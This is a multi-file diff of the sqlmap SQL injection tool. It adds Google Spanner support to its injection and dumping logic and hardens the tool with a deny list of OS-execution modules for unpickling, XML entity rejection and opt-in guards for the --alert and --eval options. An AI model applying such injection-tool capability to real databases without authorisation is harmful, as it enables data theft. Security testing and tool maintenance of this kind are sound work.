@ -410,6 +410,9 @@ class Agent(object):
|
|||
"""
|
||||
|
||||
if payload:
|
||||
if Backend.isDbms(DBMS.SPANNER):
|
||||
payload = payload.replace(" FROM default.", " FROM ").replace(" FROM `default`.", " FROM ")
|
||||
|
||||
for match in re.finditer(r"(?s)%s(.*?)%s" % (BOUNDED_BASE64_MARKER, BOUNDED_BASE64_MARKER), payload):
|
||||
_ = encodeBase64(match.group(1), binary=False, encoding=conf.encoding or UNICODE_ENCODING, safe=conf.base64Safe)
|
||||
payload = payload.replace(match.group(0), _)
|
||||
|
|
@ -724,7 +727,7 @@ class Agent(object):
|
|||
elif fieldsNoSelect:
|
||||
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE, DBMS.SPANNER):
|
||||
if fieldsExists:
|
||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||
|
|
@ -1045,7 +1048,7 @@ class Agent(object):
|
|||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
|
||||
limitedQuery += " %s" % limitStr
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE, DBMS.SPANNER):
|
||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
|
||||
limitedQuery += " %s" % limitStr
|
||||
|
||||
|
|
|
|||
|
|
@ -13,6 +13,7 @@ import contextlib
|
|||
import copy
|
||||
import functools
|
||||
import getpass
|
||||
import hmac
|
||||
import hashlib
|
||||
import inspect
|
||||
import io
|
||||
|
|
@ -130,7 +131,7 @@ from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
|
|||
from lib.core.settings import FORM_SEARCH_REGEX
|
||||
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
|
||||
from lib.core.settings import GIT_PAGE
|
||||
from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
|
||||
from lib.core.settings import GITHUB_REPORT_PAT_TOKEN
|
||||
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_REGEX
|
||||
from lib.core.settings import HASHDB_MILESTONE_VALUE
|
||||
from lib.core.settings import HOST_ALIASES
|
||||
|
|
@ -463,11 +464,11 @@ class Backend(object):
|
|||
@staticmethod
|
||||
def setArch():
|
||||
msg = "what is the back-end database management system architecture?"
|
||||
msg += "\n[1] 32-bit (default)"
|
||||
msg += "\n[2] 64-bit"
|
||||
msg += "\n[1] 32-bit"
|
||||
msg += "\n[2] 64-bit (default)"
|
||||
|
||||
while True:
|
||||
choice = readInput(msg, default='1')
|
||||
choice = readInput(msg, default='2')
|
||||
|
||||
if hasattr(choice, "isdigit") and choice.isdigit() and int(choice) in (1, 2):
|
||||
kb.arch = 32 if int(choice) == 1 else 64
|
||||
|
|
@ -1993,11 +1994,15 @@ def getLocalIP():
|
|||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((conf.hostname, conf.port))
|
||||
retVal, _ = s.getsockname()
|
||||
s.close()
|
||||
except:
|
||||
debugMsg = "there was an error in opening socket "
|
||||
debugMsg += "connection toward '%s'" % conf.hostname
|
||||
logger.debug(debugMsg)
|
||||
finally:
|
||||
try:
|
||||
s.close()
|
||||
except socket.error:
|
||||
pass
|
||||
|
||||
return retVal
|
||||
|
||||
|
|
@ -4009,7 +4014,7 @@ def createGithubIssue(errMsg, excMsg):
|
|||
pass
|
||||
|
||||
data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
|
||||
token = getText(zlib.decompress(decodeBase64(GITHUB_REPORT_OAUTH_TOKEN[::-1], binary=True))[0::2][::-1])
|
||||
token = getText(zlib.decompress(decodeBase64(GITHUB_REPORT_PAT_TOKEN[::-1], binary=True))[0::2][::-1])
|
||||
req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % token, HTTP_HEADER.USER_AGENT: fetchRandomAgent()})
|
||||
|
||||
try:
|
||||
|
|
@ -4294,7 +4299,7 @@ def safeSQLIdentificatorNaming(name, isTable=False):
|
|||
if not conf.noEscape:
|
||||
retVal = unsafeSQLIdentificatorNaming(retVal)
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users)
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE, DBMS.SPANNER): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users)
|
||||
retVal = "`%s`" % retVal
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE):
|
||||
retVal = "\"%s\"" % retVal
|
||||
|
|
@ -4333,7 +4338,7 @@ def unsafeSQLIdentificatorNaming(name):
|
|||
retVal = name
|
||||
|
||||
if isinstance(name, six.string_types):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE, DBMS.SPANNER):
|
||||
retVal = name.replace("`", "")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE):
|
||||
retVal = name.replace("\"", "")
|
||||
|
|
@ -4760,7 +4765,11 @@ def findPageForms(content, url, raiseException=False, addToTargets=False):
|
|||
retVal.add(target)
|
||||
|
||||
for match in re.finditer(r"\.post\(['\"]([^'\"]*)['\"],\s*\{([^}]*)\}", content):
|
||||
url = _urllib.parse.urljoin(url, htmlUnescape(match.group(1)))
|
||||
try:
|
||||
url = _urllib.parse.urljoin(url, htmlUnescape(match.group(1)))
|
||||
except ValueError:
|
||||
continue
|
||||
|
||||
data = ""
|
||||
|
||||
for name, value in re.findall(r"['\"]?(\w+)['\"]?\s*:\s*(['\"][^'\"]+)?", match.group(2)):
|
||||
|
|
@ -5646,3 +5655,28 @@ def checkSums():
|
|||
break
|
||||
|
||||
return retVal
|
||||
|
||||
def safeCompareStrings(a, b):
|
||||
"""
|
||||
Constant-time string comparison to prevent timing attacks.
|
||||
>>> safeCompareStrings("test", "test")
|
||||
True
|
||||
>>> safeCompareStrings("test", None)
|
||||
False
|
||||
>>> safeCompareStrings("test1", "test2")
|
||||
False
|
||||
"""
|
||||
if a is None or b is None:
|
||||
return a == b
|
||||
|
||||
if hasattr(hmac, "compare_digest"):
|
||||
return hmac.compare_digest(a, b)
|
||||
|
||||
# Fallback for Python < 2.7.7 and < 3.3
|
||||
if len(a) != len(b):
|
||||
return False
|
||||
|
||||
result = 0
|
||||
for x, y in zip(a, b):
|
||||
result |= ord(x) ^ ord(y)
|
||||
return result == 0
|
||||
|
|
|
|||
|
|
@ -412,6 +412,8 @@ def stdoutEncode(value):
|
|||
Returns textual representation of a given value safe for writing to stdout
|
||||
>>> stdoutEncode(b"foobar")
|
||||
'foobar'
|
||||
>>> stdoutEncode({"url": "http://example.com/foo", "data": "id=1"}) == {"url": "http://example.com/foo", "data": "id=1"}
|
||||
True
|
||||
"""
|
||||
|
||||
if value is None:
|
||||
|
|
@ -437,7 +439,8 @@ def stdoutEncode(value):
|
|||
if isinstance(value, (bytes, bytearray)):
|
||||
value = getUnicode(value, encoding)
|
||||
elif not isinstance(value, str):
|
||||
value = str(value)
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/6054
|
||||
return value
|
||||
|
||||
try:
|
||||
retVal = value.encode(encoding, errors="replace").decode(encoding, errors="replace")
|
||||
|
|
|
|||
|
|
@ -38,6 +38,8 @@ class AttribDict(dict):
|
|||
Maps values to attributes
|
||||
Only called if there *is NOT* an attribute with this name
|
||||
"""
|
||||
if item.startswith('__') and item.endswith('__'):
|
||||
raise AttributeError(item)
|
||||
|
||||
try:
|
||||
return self.__getitem__(item)
|
||||
|
|
|
|||
|
|
@ -40,6 +40,7 @@ from lib.core.settings import VERTICA_ALIASES
|
|||
from lib.core.settings import VIRTUOSO_ALIASES
|
||||
from lib.core.settings import CLICKHOUSE_ALIASES
|
||||
from lib.core.settings import SNOWFLAKE_ALIASES
|
||||
from lib.core.settings import SPANNER_ALIASES
|
||||
|
||||
FIREBIRD_TYPES = {
|
||||
261: "BLOB",
|
||||
|
|
@ -252,6 +253,7 @@ DBMS_DICT = {
|
|||
DBMS.RAIMA: (RAIMA_ALIASES, None, None, None),
|
||||
DBMS.VIRTUOSO: (VIRTUOSO_ALIASES, None, None, None),
|
||||
DBMS.SNOWFLAKE: (SNOWFLAKE_ALIASES, None, None, "snowflake"),
|
||||
DBMS.SPANNER: (SPANNER_ALIASES, None, None, "spanner"),
|
||||
}
|
||||
|
||||
# Reference: https://blog.jooq.org/tag/sysibm-sysdummy1/
|
||||
|
|
@ -292,6 +294,7 @@ HEURISTIC_NULL_EVAL = {
|
|||
DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
|
||||
DBMS.CLICKHOUSE: "halfMD5(NULL)",
|
||||
DBMS.SNOWFLAKE: "BOOLNOT(NULL)",
|
||||
DBMS.SPANNER: "FARM_FINGERPRINT(NULL)",
|
||||
}
|
||||
|
||||
SQL_STATEMENTS = {
|
||||
|
|
|
|||
|
|
@ -410,14 +410,17 @@ class Dump(object):
|
|||
db = "All"
|
||||
table = tableValues["__infos__"]["table"]
|
||||
|
||||
safeDb = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db))
|
||||
safeTable = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table))
|
||||
|
||||
if conf.api:
|
||||
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
|
||||
|
||||
try:
|
||||
dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db))
|
||||
dumpDbPath = os.path.join(conf.dumpPath, safeDb)
|
||||
except UnicodeError:
|
||||
try:
|
||||
dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
|
||||
dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(safeDb))
|
||||
except (UnicodeError, OSError):
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
||||
warnMsg = "currently unable to use regular dump directory. "
|
||||
|
|
@ -427,16 +430,14 @@ class Dump(object):
|
|||
dumpDbPath = tempDir
|
||||
|
||||
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
|
||||
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % safeDb))
|
||||
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||
if not os.path.isdir(dumpDbPath):
|
||||
try:
|
||||
os.makedirs(dumpDbPath)
|
||||
except:
|
||||
warnFile = True
|
||||
|
||||
_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db))
|
||||
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(getBytes(db)).hexdigest()[:8]))
|
||||
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (safeDb, hashlib.md5(getBytes(db)).hexdigest()[:8]))
|
||||
|
||||
if not os.path.isdir(dumpDbPath):
|
||||
try:
|
||||
|
|
@ -450,7 +451,8 @@ class Dump(object):
|
|||
|
||||
dumpDbPath = tempDir
|
||||
|
||||
dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))
|
||||
dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, "%s.%s" % (safeTable, conf.dumpFormat.lower()))
|
||||
|
||||
if not checkFile(dumpFileName, False):
|
||||
try:
|
||||
openFile(dumpFileName, "w+").close()
|
||||
|
|
@ -458,13 +460,10 @@ class Dump(object):
|
|||
raise
|
||||
except:
|
||||
warnFile = True
|
||||
|
||||
_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
||||
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
||||
_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table))
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||
if IS_WIN and safeTable.upper() in WINDOWS_RESERVED_NAMES:
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (safeTable, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||
else:
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (safeTable, conf.dumpFormat.lower()))
|
||||
else:
|
||||
appendToFile = any((conf.limitStart, conf.limitStop))
|
||||
|
||||
|
|
@ -548,7 +547,7 @@ class Dump(object):
|
|||
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
|
||||
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
|
||||
dataToDumpFile(dumpFP, "<meta name=\"generator\" content=\"%s\" />\n" % VERSION_STRING)
|
||||
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
|
||||
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)).replace("<", ""))
|
||||
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
|
||||
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")
|
||||
|
||||
|
|
|
|||
|
|
@ -61,6 +61,7 @@ class DBMS(object):
|
|||
RAIMA = "Raima Database Manager"
|
||||
VIRTUOSO = "Virtuoso"
|
||||
SNOWFLAKE = "Snowflake"
|
||||
SPANNER = "Spanner"
|
||||
|
||||
class DBMS_DIRECTORY_NAME(object):
|
||||
ACCESS = "access"
|
||||
|
|
@ -92,6 +93,7 @@ class DBMS_DIRECTORY_NAME(object):
|
|||
RAIMA = "raima"
|
||||
VIRTUOSO = "virtuoso"
|
||||
SNOWFLAKE = "snowflake"
|
||||
SPANNER = "spanner"
|
||||
|
||||
class FORK(object):
|
||||
MARIADB = "MariaDB"
|
||||
|
|
|
|||
|
|
@ -1057,6 +1057,7 @@ def _setSocketPreConnect():
|
|||
|
||||
def _thread():
|
||||
while kb.get("threadContinue") and not conf.get("disablePrecon"):
|
||||
done = False
|
||||
try:
|
||||
with kb.locks.socket:
|
||||
keys = list(socket._ready.keys())
|
||||
|
|
@ -1076,6 +1077,7 @@ def _setSocketPreConnect():
|
|||
if q is not None and len(q) < SOCKET_PRE_CONNECT_QUEUE_SIZE:
|
||||
q.append((s, time.time()))
|
||||
s = None
|
||||
done = True
|
||||
|
||||
if s is not None:
|
||||
try:
|
||||
|
|
@ -1088,7 +1090,7 @@ def _setSocketPreConnect():
|
|||
except:
|
||||
pass
|
||||
finally:
|
||||
time.sleep(0.01)
|
||||
time.sleep(0.01 if not done else 0.001)
|
||||
|
||||
def create_connection(*args, **kwargs):
|
||||
retVal = None
|
||||
|
|
@ -1990,7 +1992,7 @@ def _cleanupEnvironment():
|
|||
Cleanup environment (e.g. from leftovers after --shell).
|
||||
"""
|
||||
|
||||
if issubclass(_http_client.socket.socket, socks.socksocket):
|
||||
if getattr(_http_client.socket, "socket", None) is not getattr(socks, "_orgsocket", None):
|
||||
socks.unwrapmodule(_http_client)
|
||||
|
||||
if hasattr(socket, "_ready"):
|
||||
|
|
@ -2086,6 +2088,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
|
||||
|
||||
kb.checkWafMode = False
|
||||
kb.choices = AttribDict(keycheck=False)
|
||||
kb.codePage = None
|
||||
kb.commonOutputs = None
|
||||
|
|
@ -2668,6 +2671,20 @@ def _basicOptionValidation():
|
|||
errMsg = "switch '--dump' is incompatible with switch '--search'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.alert and os.environ.get("SQLMAP_UNSAFE_ALERT") != '1':
|
||||
errMsg = "for security reasons, to prevent execution of potentially malicious "
|
||||
errMsg += "OS commands via configuration files or copy-paste attacks, "
|
||||
errMsg += "the '--alert' option requires the environment variable "
|
||||
errMsg += "'SQLMAP_UNSAFE_ALERT=1' to be explicitly set"
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
if conf.evalCode and os.environ.get("SQLMAP_UNSAFE_EVAL") != '1':
|
||||
errMsg = "for security reasons, to prevent execution of potentially malicious "
|
||||
errMsg += "Python code via configuration files or copy-paste attacks, "
|
||||
errMsg += "the '--eval' option requires the environment variable "
|
||||
errMsg += "'SQLMAP_UNSAFE_EVAL=1' to be explicitly set"
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
if conf.chunked and not any((conf.data, conf.requestFile, conf.forms)):
|
||||
errMsg = "switch '--chunked' requires usage of (POST) options/switches '--data', '-r' or '--forms'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
|
|
|||
|
|
@ -63,6 +63,7 @@ optDict = {
|
|||
"safeReqFile": "string",
|
||||
"safeFreq": "integer",
|
||||
"skipUrlEncode": "boolean",
|
||||
"skipXmlEncode": "boolean",
|
||||
"csrfToken": "string",
|
||||
"csrfUrl": "string",
|
||||
"csrfMethod": "string",
|
||||
|
|
|
|||
|
|
@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission
|
|||
|
||||
import codecs
|
||||
import collections
|
||||
import difflib
|
||||
import inspect
|
||||
import logging
|
||||
import os
|
||||
|
|
@ -160,6 +161,66 @@ def dirtyPatches():
|
|||
|
||||
logging._releaseLock = _releaseLock
|
||||
|
||||
from xml.etree import ElementTree as et
|
||||
if not getattr(et, "_patched", False):
|
||||
_real_parse = et.parse
|
||||
|
||||
def _safe_parse(source, parser=None):
|
||||
if parser is None:
|
||||
parser = et.XMLParser()
|
||||
if hasattr(parser, "parser"):
|
||||
def reject(*args): raise ValueError("XML entities are forbidden")
|
||||
parser.parser.EntityDeclHandler = reject
|
||||
parser.parser.UnparsedEntityDeclHandler = reject
|
||||
|
||||
return _real_parse(source, parser=parser)
|
||||
|
||||
et.parse = _safe_parse
|
||||
et._patched = True
|
||||
|
||||
import io
|
||||
import pickle
|
||||
if not getattr(pickle, "_patched", False):
|
||||
class RestrictedUnpickler(pickle.Unpickler):
|
||||
def find_class(self, module, name):
|
||||
# blacklist for OS-level execution modules
|
||||
if module in ("os", "subprocess", "sys", "posix", "nt", "pty", "commands", "shutil"):
|
||||
raise ValueError("Unpickling of module '%s' is forbidden" % module)
|
||||
|
||||
# Python 2/3 method resolution
|
||||
if hasattr(pickle.Unpickler, "find_class"):
|
||||
return pickle.Unpickler.find_class(self, module, name)
|
||||
|
||||
__import__(module)
|
||||
return getattr(sys.modules[module], name)
|
||||
|
||||
def _safe_loads(data):
|
||||
try:
|
||||
stream = io.BytesIO(data)
|
||||
except TypeError:
|
||||
stream = io.StringIO(data)
|
||||
|
||||
return RestrictedUnpickler(stream).load()
|
||||
|
||||
pickle.loads = _safe_loads
|
||||
pickle._patched = True
|
||||
|
||||
try:
|
||||
import cPickle
|
||||
if not getattr(cPickle, "_patched", False):
|
||||
cPickle.loads = pickle.loads
|
||||
cPickle._patched = True
|
||||
except ImportError:
|
||||
pass
|
||||
|
||||
try:
|
||||
import builtins
|
||||
except ImportError:
|
||||
import __builtin__ as builtins
|
||||
|
||||
if "enumerate" in difflib.__dict__ and difflib.enumerate is not builtins.enumerate:
|
||||
difflib.enumerate = builtins.enumerate
|
||||
|
||||
def resolveCrossReferences():
|
||||
"""
|
||||
Place for cross-reference resolution
|
||||
|
|
|
|||
|
|
@ -20,7 +20,7 @@ from lib.core.enums import OS
|
|||
from thirdparty import six
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.10.2.0"
|
||||
VERSION = "1.10.5.1"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
|
|
@ -62,7 +62,7 @@ LOWER_RATIO_BOUND = 0.02
|
|||
UPPER_RATIO_BOUND = 0.98
|
||||
|
||||
# For filling in case of dumb push updates
|
||||
DUMMY_JUNK = "theim1Ga"
|
||||
DUMMY_JUNK = "fooj0Zo4"
|
||||
|
||||
# Markers for special cases when parameter values contain html encoded characters
|
||||
PARAMETER_AMP_MARKER = "__PARAMETER_AMP__"
|
||||
|
|
@ -122,7 +122,10 @@ PRECONNECT_CANDIDATE_TIMEOUT = 10
|
|||
PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP", "BaseHTTP")
|
||||
|
||||
# Identify WAF/IPS inside limited number of responses (Note: for optimization purposes)
|
||||
IDENTYWAF_PARSE_LIMIT = 10
|
||||
IDENTYWAF_PARSE_COUNT_LIMIT = 10
|
||||
|
||||
# Identify WAF/IPS inside limited size of responses
|
||||
IDENTYWAF_PARSE_PAGE_LIMIT = 4 * 1024
|
||||
|
||||
# Maximum sleep time in "Murphy" (testing) mode
|
||||
MAX_MURPHY_SLEEP_TIME = 3
|
||||
|
|
@ -295,6 +298,7 @@ FRONTBASE_SYSTEM_DBS = ("DEFINITION_SCHEMA", "INFORMATION_SCHEMA")
|
|||
RAIMA_SYSTEM_DBS = ("",)
|
||||
VIRTUOSO_SYSTEM_DBS = ("",)
|
||||
SNOWFLAKE_SYSTEM_DBS = ("INFORMATION_SCHEMA",)
|
||||
SPANNER_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SPANNER_SYS")
|
||||
|
||||
# Note: (<regular>) + (<forks>)
|
||||
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
|
||||
|
|
@ -326,13 +330,14 @@ FRONTBASE_ALIASES = ("frontbase",)
|
|||
RAIMA_ALIASES = ("raima database manager", "raima", "raimadb", "raimadm", "rdm", "rds", "velocis")
|
||||
VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso")
|
||||
SNOWFLAKE_ALIASES = ("snowflake",)
|
||||
SPANNER_ALIASES = ("spanner", "google cloud spanner", "google spanner")
|
||||
|
||||
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
|
||||
|
||||
SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES + SNOWFLAKE_ALIASES)
|
||||
SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES + SNOWFLAKE_ALIASES + SPANNER_ALIASES)
|
||||
SUPPORTED_OS = ("linux", "windows")
|
||||
|
||||
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES), (DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES))
|
||||
